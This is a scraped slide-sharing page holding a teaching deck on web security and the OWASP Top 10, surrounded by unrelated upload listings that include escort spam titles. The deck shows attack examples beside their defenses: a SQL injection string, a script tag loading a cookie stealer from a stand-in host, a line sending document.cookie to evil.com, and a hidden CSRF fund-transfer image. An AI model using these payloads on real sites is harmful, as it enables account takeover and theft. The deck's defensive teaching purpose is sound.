The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsJheuzeDellosa
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...OnePlan Solutions
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxbodapatigopi8531
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionSolGuruz
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationkaushalgiri8080
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about usDynamic Netsoft
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...OnePlan Solutions
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 

Recently uploaded (20)

5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
Exploring iOS App Development: Simplifying the Process
Exploring iOS App Development: Simplifying the ProcessExploring iOS App Development: Simplifying the Process
Exploring iOS App Development: Simplifying the Process
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number Systems
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptx
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanation
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about us
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 

Web security and OWASP

  • 1. Web Security & OWASP By-Isuru Samaraweera
  • 2. Agenda • What is web security and why? • Introduction to OWASP • OWASP top 10 • OWASP Security testing tools • General Security testing tools • Q & A
  • 3. What is web security and why? • Security of websites, web applications and web services. • Emergence of Web 2.0 • Intruders exploits vulnerabilities • Techniques XSS,Sql Injection etc • Attacker profiles • Catastrophic security hacks • Sony Entertainment 2011- 77 million accounts with credit card numbers • JP Morgan chase 2014 -7.6million account information • Master Card- 2005 -40 million accounts • Business risk • Trust issues • Overhead costs • Security checkpoints and techniques • Early stages of development
  • 4. OWASP(https://www.owasp.org) • The Open Web Application Security Project (OWASP) • Non profit organization, open community • Vulnerabilities, threats, attacks and countermeasures • Development guide • https://www.owasp.org/index.php/Projects/OWASP_Development_Guide • Testing guide • https://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf • Code review guide • https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf • Webgoat sample web application • https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project • Mailing lists • https://lists.owasp.org/mailman/listinfo • Newsletter • https://www.owasp.org/index.php/Category:OWASP_Newsletter • Many more…
  • 5. OWASP top 10 (2017) • Injection • Broken Authentication and Session Management (XSS) • Cross Site Scripting (XSS) • Broken access Control • Security Misconfiguration • Sensitive Data Exposure • Missing Function Level Access Control • Cross Site Request Forgery (CSRF) • Using Components with Known Vulnerabilities • Under protected APIs
  • 6. (#1)-Injection • Send untrusted data into the system • Text based attacks • External,internal parties • SQL,LDAP,JPQL,Xpath,Nosql • String query = "SELECT * FROM user_data WHERE lastName='" + request.getParameter(“lastName") + "'"; • Query HQLQuery = session.createQuery(“FROM user_data WHERE lastName ='“ + request.getParameter(“lastName") + "'"); • http://example.com/app/userView?lastName=' or '1'='1
  • 7.
  • 8. Preventing Injection • Avoid dynamic queries • Parameterized queries • PreparedStatement,SQLCommand,PDO • Stored procedures • Input validation • Carefully escape especial characters if no api is available • OWASP Enterprise Security API • ESAPI.encoder().encodeForSQL( new OracleCodec(), queryparam ); • Use code analysis tools • https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
  • 9. (#2)-Broken Authentication and Session Management • Custom authentication , Session management with flaws • Credentials not protected with hashing • Insider attacks • Credentials can be guessed • Session id exposed in the url->session fixation • Session id won’t timeout • Session ids are not rotated on success logins • http://website.com/login.php?;jsessionid= 2P0OC2JSNDLPSKHCJUN2JV&d
  • 10. Protecting the Password • Hashing • Transport • Storage
  • 11. Crack Password Hash • Dictionary attack • File containing words, phrases, common passwords • Brute-force attack • Tries every possible combination of characters up to a given length. • Look up table • Dictionary in a lookup table data structure • Rainbow table • High performance lookup
  • 12. User Registration with Salt • App post the username foo@example.com with Password pass • Server generates a random salt r • Server computes h=H(r|pass) • Server stores (foo@example.com,hash,r) in DB
  • 13. Simplified login flow • App Post username foo@example.com and password Pass • Server lookup the salt using the user id • Server compute the hash h’=H(r|’pass’) • If(foo@example.com,h’) exists in db allow login
  • 14. Attack on password database
  • 15. Hashing with key and random salt • Is it safe?
  • 16. Hashing recipe • Bind password hash value to account • Use application secret • Follow password hashing best practices
  • 17. Transport Security of a password
  • 18. Hashing the password on client
  • 19. Encrypt the password • Asymmetric encryption • Problems?
  • 20. Preventing broken authentication contd… • Implement Proper Password Strength Controls • Password Length >10<128 • Pasword Complexity • at least 1 uppercase character (A-Z) • at least 1 lowercase character (a-z) • at least 1 digit (0-9) • at least 1 special character (punctuation) — do not forget to treat space as special characters too • Not more than 2 identical characters in a row (e.g., 111 not allowed)
  • 21. Preventing broken authentication contd.. • Authentication and Error Messages • respond with a generic error message • Incorrect Response Examples • "Login for User foo: invalid password" • "Login failed, invalid user ID" • "Login failed; account disabled" • "Login failed; this user is not active“ • Correct Response example • "Login failed; Invalid userID or password"
  • 22. Preventing broken authentication contd.. • Prevent brute force attacks • Account lock out • Multifactor authentication • Logging and Monitoring • Use of authentication protocols that require no password • Oauth • OpenId • Saml • Leverage available frameworks and tools • Apache Shiro • Spring security • Owasp esapi • https://www.owasp.org/index.php/Authentication_Cheat_Sheet
  • 23. Preventing Session Management issues • Secure login over Https • Password submitted encrypted • Immediate redirect to http • Session id sent in clear text-<Vulnerability
  • 24. Preventing Session Management issues contd.. • User requests HTTP page,response redirects to HTTPS • 302 Response is HTTP Vulnerability point
  • 25. Preventing Session Management issues contd.. • HSTS –Http Strict Transport Layer security • Opt-in security control • Instructs browser upgrade the security for STS • HSTS forces • All communications over HTTPS • No insecure http requests sent from browser • No option for user to override untrusted certificates
  • 26. Enabling HSTS • In Apache add below to .htaccess • # Use HTTP Strict Transport Security to force client to use secure connections only Header always set Strict-Transport-Security "max- age=300; includeSubDomains; “ Max-age =>The time, in seconds, that the browser should remember that this site is only to be accessed using HTTPS. includeSubDomains=>If this optional parameter is specified, this rule applies to all of the site's subdomains as well. • Can be done in Nginx,IIS etc
  • 27. Preventing Session Management issues contd.. • HTTP Strict Transport Security (HSTS) • Cookies • Secure • <secure>true</secure> • HttpOnly • <http-only>true</http-only> • Cache-Control: no-cache,no-store • Pragma: no-cache • New session ids on consecutive logins
  • 28. • https://www.owasp.org/index.php/Session_Management_Cheat_Sheet • https://www.owasp.org/index.php/Authentication_Cheat_Sheet • https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet • https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet • https://www.owasp.org/index.php/Testing_for_authentication • https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_ Sheet
  • 29. (#3)-Cross Site scripting(XSS) • Text-based attack scripts that exploit the interpreter in the browser. • The attacker adds the following comment: • Great price for a great item! Read my review here <script src="http://hackersite.com/authstealer.js"> </script>. • Document.location=http://evil.com?id=document.cookie
  • 31. Preventing XSS • Html escape before inserting untrusted data • String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) ); • & --> &amp; • < --> &lt; • > --> &gt; • JavaScript Escape Before Inserting Untrusted Data • <script>alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')</script> • String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter( "input" ) ); • Css Escape Before Inserting Untrusted Data • <style>selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...; } </style> • String safe = ESAPI.encoder().encodeForCss( request.getParameter( "input" ) );
  • 32. Preventing XSS contd… • URL Escape Before Inserting Untrusted Data • <a href="http://www.somesite.com?test=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a > • String safe = ESAPI.encoder().encodeForURL( request.getParameter( "input" ) ); • XSS Filters-Block requests with dangerous tags,scripts • OWASP antisamy project • HTML and CSS encoding. • https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project • Html sanitizer project • https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project • https://github.com/mganss/HtmlSanitizer • https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Che at_Sheet
  • 33. (#4)-Broken access Control • Unprivileged function access • http://example.com/app/getappInfo • http://example.com/app/admin_getappInfo • Unauthorized data access • htttp://soomebank.com/showacct?id=101 • http://soomebank.com/showacct?id=102 • Prevention • Access control matrix • Check access • Do not assume that users will be unaware of special or hidden URLs or APIs. • Penetration tests • Regular audits, code reviews, Automated verification • Principle of lease privilege • Principle of defense in depth • https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference • https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access
  • 34. (#5)-Security misconfiguration • Can happen at any level • Web server • App server • Database • Custom code • Out of date software • Unnecessary ports,services • Error message throws stack trace? • Framework settings set to secure value?(struts,spring,.net etc) • Prevention • Frequent audits • Deployment process • Automate configuration validity • https://www.owasp.org/index.php/Configuration • https://www.owasp.org/index.php/Error_Handling • https://www.owasp.org/index.php/Testing_for_configuration_management • https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006) • https://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management
  • 35. (#6)-Sensitive data exposure • Passwords ,credit card numbers etc (transit or rest) • Not encrypting sensitive data • Use weak keys and algorithms to encrypt • SSL not enabled in the entire path • Prevention measures • Encrypt sensitive data accurately • AES-256 • Key encrypting key • Hardware security modules • RSA 2048 • Don’t store sensitive data unnecessarily • Disable caching and auto completion • https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet • https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet • https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet • https://www.owasp.org/index.php/Testing_for_SSL-TLS
  • 36. (#7) -Insufficient Attack Protection • Inability to detect, prevent, and respond to both manual and automated attacks • Attack with OWASP ZAP,SQL map tools(http://sqlmap.org/) • Manual human attack • Detect attacks -> OWASP App sensor • An input a legitimate client can’t generate? • Unusual usage patterns, repeated requests, spikes? • Respond to attacks->OWASP App sensor • Decide whether to automatically block requests, • IP addresses, or IP ranges. • Consider disabling or monitoring misbehaving user accounts. • Patch quickly
  • 38. • Monitor log files • Monitor network bandwidth
  • 39. • https://www.owasp.org/index.php/OWASP_AppSensor_Project • https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_A pplications • https://www.owasp.org/index.php/Credential_Stuffing_Prevention_Cheat_ Sheet • https://www.owasp.org/index.php/Virtual_Patching_Cheat_Sheet • https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_R ule_Set_Project • https://www.owasp.org/index.php/Intrusion_Detection
  • 40. (#8)-Cross Site Request Forgery • Attacker trick the victim with urls • Execute unwanted actions • Compromise the entire application • http://example.com/app/transferFunds?amount=1500&destinationAccou nt=4673243243 • Attacker emails below url to the victim • <img src="http://example.com/app/transferFunds? amount=1500&destinationAccount=attackersAcct#“ width="0" height="0" />
  • 41. Preventing CSRF • Include unique token in hiddenfield • Verify the token on each request • CSRFGuard • Reauthenticate • https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet • http://lists.owasp.org/pipermail/owasp-csrfguard
  • 42. (#9)-Using components with known vulnerabilities • Outdated libraries • Apache CXF Authentication Bypass (2012) • Call with no identity token => invoke any web service with full permission • Spring Remote Code Execution(2011/2012) • Expression Language flow=>Execute arbitrary code on the server • Struts2 Remote code execution(2017) • Mishandles file upload • Content-Type header flow=>Execution of arbitrary code on the server
  • 43. Preventing Using components with known vulnerabilities • Identify all components and dependent libraries • OWASP_Dependency_Check • https://www.owasp.org/index.php/OWASP_Dependency_Check • Retire.js • https://github.com/retirejs/retire.js/ • Monitor security of these components • Mailing lists • Official sites • Security policy on 3rd party libraries • Software development practices to use • Passing security tests • Acceptable licenses • Wrappers to expose only the required function in an api • https://cve.mitre.org/about/ • https://www.owasp.org/index.php/Virtual_Patching_Best_Practices
  • 44. (#10)- Underprotected APIs • REST, JSON, and XML APIs • Mobile app connecting to remote API(Username,password and accountnum) • Public SMS JSON API->SQL injection • XML XXE • External entity is processed by XML parser • Prevention • Secured communications between the client and your APIs. • Strong authentication scheme for your APIs, • Parser configuration is hardened against attack. • Protect against injection of all forms • https://www.owasp.org/index.php/REST_Security_Cheat_Sheet • https://www.owasp.org/index.php/Web_Service_Security_Cheat_Sheet
  • 45.
  • 46. OWASP Testing tools • The OWASP Application Security Verification Standard (ASVS) Project • Test ,web application technical security controls • Requirements for secure development. • Procurement • https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verificatio n_Standard_Project • OWASP live CD project • Best open source security tools into a single bootable environment • Boot from this Live CD or run VM • Access to a full security testing suite • No configuration required • OWASP ZAP • https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools
  • 47. General Security Testing tools • Iron Wasp(https://ironwasp.org/) • Over 25 kinds of web vulnerabilities • Wireshark(https://www.wireshark.org/) • Network packet analyzer. • Google Nogotofail( https://github.com/google/nogotofail) • Known TLS/SSL vulnerabilities and misconfigurations. • SQlMap( http://sqlmap.org/) • Sql Injection • Qualys(https://www.qualys.com)
  • 48. Security code review • Fastest and accurate • Data Validation • Authentication • Session management • Authorization • Cryptography • Error handling • Logging • Security Configuration • Network Architecture • Tools • Code crawler • Orizon • O2 • FindSecurityBugs